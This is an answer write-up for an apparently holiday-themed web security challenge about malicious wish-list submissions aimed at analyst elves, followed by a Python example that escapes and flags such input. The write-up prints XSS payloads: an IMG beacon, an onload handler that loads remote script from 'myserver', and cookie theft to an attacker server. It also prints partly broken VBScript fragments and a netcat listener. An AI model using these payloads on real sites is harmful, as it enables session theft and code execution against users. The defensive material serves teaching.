By Ron Sweeney
1. What is the purpose of the first malicious wish text, and how does it work?
For example if the child put:
<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>
The analyst elf would see "nothing" or a broken image
embedded in the submission. Typically you can use a transparent 1x1 image to accommodate this task.
You could also tail the log of "bumblesnowmonster.com", bounce it off a rogue mail script, or set up nc -l
<img src='http://www.bumblesnowmonster.com/clear.gif' onload='document.scripts(0).src="http://myserver/eviljavascript.js"'>
This would make the script source the source of the first page and make the analyst's browser
load and execute the evil script. The script here could be something like:
Set WWObj = CreateObject("Word.Document")
document.write("I just ate 37 bytes on your hard drive")
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
Next ' cdrom
which makes for a great coffee holder!
2. What is the purpose of the second malicious wish text, and how does it work?
The wish actually embeds the elves' cookie as an argument to a script on "http://myserver"; from there it can be "dug out" of the server requests on "myserver", so the evil children can access
the same list as the analysts. Probably write a cool script called naughty2nice.pl and post it to BUGTRAQ too.
3. How could Hermey and Rudolph thwart the first and second types of attacks by altering the
Web application? Alternatively, how could they stop these attacks by changing the configuration of the
analyst elves' browsers?
You can lock down the web application by disabling cross-site scripting or by
ignoring certain input types in the text box for the front end of the submissions.
You can lock down the browsers by setting them to disable or prompt for "access data sources across domains" or
by using high security settings for JavaScript.
4. Beyond these browser-based attacks, Hermey was also concerned about attackers submitting similar elements in children's wish lists submitted via e-mail. What are two different
methods for defeating such attacks by altering an e-mail reader's configuration?
Turn off HTML, or HTML with "preview" functionality, in the mail reader. Also, some operating systems share the same security
mechanism across mail readers and Internet applications; in either case you can disable or prompt for "access data sources across domains" in the same manner.
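As an added example (not part of Ron Sweeney's write-up), the following Python shows one way the web-application side of the answer to question 3 could be implemented: submissions are HTML-escaped before the analyst page renders them, so an embedded IMG tag arrives as literal text rather than markup, and any submission containing tags, on* event handlers, javascript: URLs or external links is flagged so the analysts know an attempt was made. The hostname attacker.example, the sample wishes and the function names are all constructed for this example.

```python
"""
Added example of a defensive screen for wish-list submissions.
Two layers: output encoding (always) plus input screening (for flagging).
Sample wishes and the attacker.example hostname are constructed here.
"""
import html
import re
from dataclasses import dataclass

# Any HTML tag-like construct, e.g. <IMG ...> or <img ... (even if unclosed)
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>?")
# Inline event handlers such as onload= / onerror= (may over-match words
# like "one=", which is acceptable for a review flag)
EVENT_HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
# Absolute URLs that would make the analyst's browser call out to another host
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\"<>]+", re.IGNORECASE)
# javascript: pseudo-scheme inside an attribute value
SCRIPT_SCHEME_RE = re.compile(r"javascript\s*:", re.IGNORECASE)


@dataclass
class ScreenedWish:
    safe_html: str   # escaped text, safe to embed in the analyst page
    findings: list   # reasons the submission was flagged (empty if clean)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def screen_wish(raw: str) -> ScreenedWish:
    """Escape a submission for display and record why it looks malicious."""
    findings = []
    if TAG_RE.search(raw):
        findings.append("html-tag")
    if EVENT_HANDLER_RE.search(raw):
        findings.append("event-handler")
    if SCRIPT_SCHEME_RE.search(raw):
        findings.append("script-scheme")
    for url in URL_RE.findall(raw):
        findings.append("external-url:" + url)
    # quote=True also escapes ' and ", so the text is safe inside attributes too
    return ScreenedWish(safe_html=html.escape(raw, quote=True), findings=findings)


def render_for_analyst(raw: str) -> str:
    """Build the HTML fragment the analyst elf's browser will receive."""
    screened = screen_wish(raw)
    banner = ""
    if screened.suspicious:
        banner = ('<p class="warning">Flagged: '
                  + html.escape(", ".join(screened.findings)) + "</p>")
    return banner + "<pre>" + screened.safe_html + "</pre>"


def flagged_submissions(wishes):
    """Return the indexes of submissions that need a second look."""
    return [i for i, w in enumerate(wishes) if screen_wish(w).suspicious]


# Constructed sample submissions: two harmless, two carrying markup
SAMPLE_WISHES = [
    "A red bicycle and a puppy, please.",
    '<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://attacker.example/Sample.jpg" BORDER=0>',
    "Train set <img src='http://attacker.example/clear.gif' onload='alert(1)'>",
    "a doll house",
]

if __name__ == "__main__":
    for idx in flagged_submissions(SAMPLE_WISHES):
        print(idx, screen_wish(SAMPLE_WISHES[idx]).findings)
    print(render_for_analyst(SAMPLE_WISHES[2]))
```

The escaping step is the one that actually stops the attack: once `<` becomes `&lt;` the browser never sees a tag, so no image fetch, no onload handler and no cookie-carrying request happens. The flagging step is there so the elves can see that someone tried, which is what a log-tailing attacker would otherwise enjoy in reverse.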